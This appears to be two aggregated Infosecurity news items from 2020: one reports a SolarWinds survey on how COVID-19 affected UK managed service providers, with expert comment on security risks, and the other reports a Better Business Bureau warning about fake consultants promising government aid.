UK managed services providers (MSPs) have applied for government financial relief in the wake of the COVID-19 pandemic, with 74% receiving the help they needed.

According to a survey of 500 MSPs by Solarwinds, 45% of UK MSPs have had to furlough staff, and 50% said they had applied for government financial relief.

However, whilst 65% of MSPs do not anticipate making any pricing changes to their managed services package in the long-term, 19% have reduced their services to fit shrinking customer budgets and 13% intend to increase their prices following the pandemic.

The survey also found that the majority of businesses (with a revenue up to $10m) did not think that it was likely they would engage in a merger or acquisition to support expansion. However, for MSPs with a revenue over $10m, 40% said it was likely they would engage in a merger or acquisition, while 37% said it was not likely and 23% said they were not sure.

Colin Knox, vice-president of community, SolarWinds MSP, said the overwhelming majority of MSPs retaining their staff “during a time period characterized by uncertainty is truly heartening.”

He said: “This crisis has re-enforced the value MSPs bring to businesses. Without MSPs as an extension of the team — focused on risk mitigation and business continuity — many businesses would have been lost, and wouldn’t have been able to support remote working on such a vast, immediate scale. The knowledge, expertise, and skillset of MSPs has been crucial in this changing climate. They have truly become essential.”

In an email to Infosecurity, Brian Honan, CEO of BH Consulting, said staff being furloughed is a worrying trend as it may highlight many MSSPs do not have the financial stability to survive in the long-term. He said: “Good security staff may not wish to work for a MSSP that is struggling financially and may seek better job stability elsewhere, leaving lesser skilled staff working in the MSSP. If your company’s security relies on a MSSP provider that is not financially stable you could be facing potential service delivery and service quality issues in the medium to long-term.

“It is also worth noting that criminals could take advantage of a MSSP that is furloughing their staff. Staff that are suffering financially are more susceptible to bribery which criminals will exploit. It can be cheaper and more effective to bribe an insider than it is to hack the organization.”

Honan also raised concerns about the numbers of MSPs that have staff working remotely. “Remember that some of the most sensitive data in an organization could be passed over to an MSSP,” he said. “If an MSSP had moved to a remote working environment then how secure are their remote workers? Many MSSPs traditionally have their operations center physically secured and isolated, both physically and logically, from the rest of their business to ensure the security of their clients’ networks. Can the MSSPs offer the same level of security from the homes of their remote workers?”

He also made the point that in the rush to support remote working, have those MSSPs spent enough time and resources to ensure their systems are properly secured for the new work environment?

“Let’s not forget that criminals will look to take advantage of any weakness in a company’s security,” Honan said. “We have seen attacks in the past targeting MSSP providers to use them as a stepping stone to attack the MSSP’s own customers. Alternatively criminals could take advantage of any security holes in the MSSP’s new remote working solution by attacking the MSSP to cover an attack against one or more of its customers.”

Honan also said the market has been flooded with new MSPs who see the opportunity to make money, and the coming months may see some of the smaller and non-security specialist players drop from the field as they face financial difficulties.

Categories: Cyber Risk News

Experts Warn of ‘Consultants’ Promising to Secure Fake COVID Aid

Info Security - Tue, 08/11/2020 - 10:00
Experts Warn of ‘Consultants’ Promising to Secure Fake COVID Aid

US consumer rights experts are warning of a new wave of fraudulent services claiming to help individuals and businesses get free money from government COVID-19 aid programs.

The Better Business Bureau (BBB) claimed that victims can be snared via dishonest social media ads, search results and even recommendations from unwitting friends and family.

If they click through to the scam site, fake ‘consultants’ will promise to secure government aid money where in the past an application may have been denied — for example from the US Small Business Association.

“To get started, all you have to do is fill out some paperwork. This typically requires sharing sensitive, personal information, such as your full name, home address, and government ID numbers. Next, the ‘consultant’ will ask you for an upfront payment for their services. You may also be required to pay a portion of the government aid funds you receive directly to the company, which they will likely also ask for up front,” the BBB explained.

“Most of the time, these ‘consultants’ don’t really have any special information on government aid programs. Instead, they are simply hoping to get your personal information and an initial payment. Once you’ve paid, the consultant will disappear and the company will become unreachable.”

Victims will not only lose their money but, if they’ve handed over any personal information, may be at risk of follow-on identity fraud, the BBB warned.

The non-profit urged individuals and business owners never to give out personal details to strangers and to beware of promises that sound too good to be true.

It advised would-be applicants to visit government websites direct and, if dealing with a third-party, to research them and their claims thoroughly before proceeding. The BBB has a list of accredited businesses, for example.

Categories: Cyber Risk News